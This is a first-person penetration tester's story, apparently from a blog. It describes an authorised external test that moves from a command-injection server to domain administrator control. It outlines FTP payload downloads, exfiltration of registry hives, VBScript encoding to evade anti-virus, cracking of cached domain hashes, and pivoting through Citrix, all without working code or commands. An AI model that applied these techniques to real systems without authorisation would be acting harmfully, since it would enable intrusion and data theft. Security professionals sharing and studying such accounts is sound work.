Day 1: It started off as any other day in LABS. Test this, exploit that, research this, etc. I was combing through the systems and services available to me on an external PenTest when I found a server with an odd but, ultimately, mouth-watering vulnerability. The vulnerable server would allow me to execute single commands one at a time on the server and receive the output of each. I thought to myself, “This is it, game over”. What I didn’t know is the following days would be a constant back and forth between myself and the incident response team on the other side of the firewall. I fired up Metasploit and immediately went for the kill- turning this single command execution into a full-blown shell. I set up all the necessary parameters and launched the exploit, expecting a “Sending Stage….” output shortly thereafter, but it never came. No shell. “Hmm.. ", I thought to myself. Maybe it was a fluke. So I re-launched the exploit and waited in anticipation, only to sigh that heavy, disappointing sigh we see all too often. Was it the firewall? Anti-Virus? What was derailing my success? This was going to have to be a manual job. So I poured myself another cup of Karl’s exotic coffee, and strapped in for the long day ahead.
My initial thought was it has to be the firewall keeping my reverse shell from getting out of their environment. So, leveraging the command execution vulnerability, I started testing outbound internet access from the vulnerable server to my server on the internet, only to find that the port I had been using all along in the initial Metasploit attempt was allowed out. This left me with a sense of disappointed optimism because the firewall isn’t blocking it, but for some reason it isn’t working. “Maybe it’s getting caught by Anti-Virus”, I thought. I used the command execution to generate and execute an FTP script that would download a payload from my server. The logs on my server showed an active download from the target companies network. “.. Excellent..”, I mischievously muttered to myself in my best Mr. Burns impression. I returned to the vulnerable server expecting to execute my payload, catch the shell, and claim my victory. However, my payload was nowhere to be found. Maybe it was a fluke (anyone else starting to see a pattern here). I re-launched the FTP script, watched the logs, but again my payload was AWOL. Maybe a change in direction would help. Again using the command injection, I saved off copies of the registry hives and created another FTP script to upload them to my server, executed it, and monitored the logs for active connections. The transfer completed and I returned to my server to find three new files had been uploaded. Success! I managed to leverage a chink in the armor to save a copy of the running registry hives and upload them to my server. That was a great proof of concept, but I wanted more. This was just a way to sanity check myself. What I didn’t realize at the time, however, is how crucial of a role those three files would play in the demise of my victim.
At this point the only logical conclusion I could come up with is that the Anti-Virus was catching my payload and eradicating it from the system. Childs play. I tried encoding the payload in a few other formats with no immediate success. Then, like a bag of bricks to the face, it hit me. VBScript. Who’s anti-virus detects VBScript? I encoded my payload in VBS, re-created the FTP script, and executed it. I returned to the vulnerable server, and there it was- karlscoffee.vbs. I set up my listener, executed the payload, and reveled in my success as my shell was received from inside the target network. I did a bit of enumeration on the system as well as the network, but found this to be a logical stopping point for the day. What a huge mistake this turned out to be.
Day 2: After getting settled in, Karl’s coffee in hand, I anxiously resumed testing for the day using the same attack path as before, only to find the vulnerable webserver is no longer responding to my requests. Time for a sanity check. Google? Reddit? All accessible. Vulnerable webserver? It’s like it never happened. The server was just .. gone. I finally reached out to the point of contact to determine if I caused some sort of outage:
ME: “Hi [POC], I just wanted to check on the status of a server I was testing against yesterday. It appears to not be responding today and I wanted to let you know in case this was something I inadvertently caused due to testing.”
POC: Oh? What server was it?
ME: [Server A]
POC: (shuffles through some papers) Ah yes, [Server A]. My security department let me know yesterday there was a critical vulnerability with it and we decommissioned it right away. It’s gone.
It seemed I had my chink in the armor completely removed from the network. Several desperate hours of searching for another way in left me completely empty handed. Well, not completely empty handed. I did have those registry hive files. Wait- those registry hives. I could pull cached password hashes of any user that has logged into that server from those registry hives! So I extracted the cached domain credentials from the hives, and there it was: The domain administrator password hash for their secondary domain, amongst other accounts. My eyes lit up with a renewed sense of excitement. I quickly ran the hash through a password cracker and waited anxiously to see if it cracked. After what felt like an eternity, the results were in- it had been cracked! Now to find a way in.
I distinctly remembered coming across a Citrix server at some point during the test, but thought to myself, “Surely the domain administrator account doesn’t have any Citrix access, right? Surely the password has been changed since the last time the account was logged into on that server… RIGHT?” Wrong. I tracked down the Citrix server, logged in as the domain administrator, and lo and behold, not only did the account have access, but it also had access to every application published in Citrix, including a command prompt for the Citrix server. I launched the command prompt and rejoiced in my newfound foothold into the target environment. A bit of command line kung-fu later, I had a full desktop environment on the company’s Citrix server. This was a great baseline, but I wanted more.
I needed to pivot further into the environment, and for that I would need a meterpreter shell to proxy all of my traffic. “No problem” I thought. I’ll just download another payload from my server. So I launched Internet Explorer and attempted to download my payload again, but much to my surprise, the Anti-Virus software caught it. Incident Response had recovered my VBS payload from the first server and created a signature for it. Touche blue team, touchée. Fortunately, I was able to determine what files and folders the company had excepted from AV scanning and figured I could just download my payload there. So I returned to IE and attempted to save the payload to an AV-safe directory, only to find that Incident Response had blacklisted the ability to transfer files through a web browser! I suddenly found myself in a live-fire engagement with Incident Response. "Shall we play a game”? [quote from Wargames, 1983] Touché blue team, touché. A bit of Citrix-fu, however, allowed me to copy the payload over directly through a drive mapping feature which mapped my local drive as a network drive on the Citrix server. I executed the payload, received my meterpreter shell, and started pivoting my way deeper and deeper into the target network, lurking in the dark, and staying off of Incident Response’s radar. After coming this far, the last thing I needed was them to find me and terminate my presence.
It was only a matter of time before I pivoted to enough systems to acquire the primary domain’s administrator password. It had been a hard fought battle, but I had won. I gained domain administrator access for both domains and acquired a wealth of sensitive information. Bank accounts, credit cards, SSNs, W2s… all mine. I had complete control over the internal network. From Westminster. With Karl’s coffee. *Sip.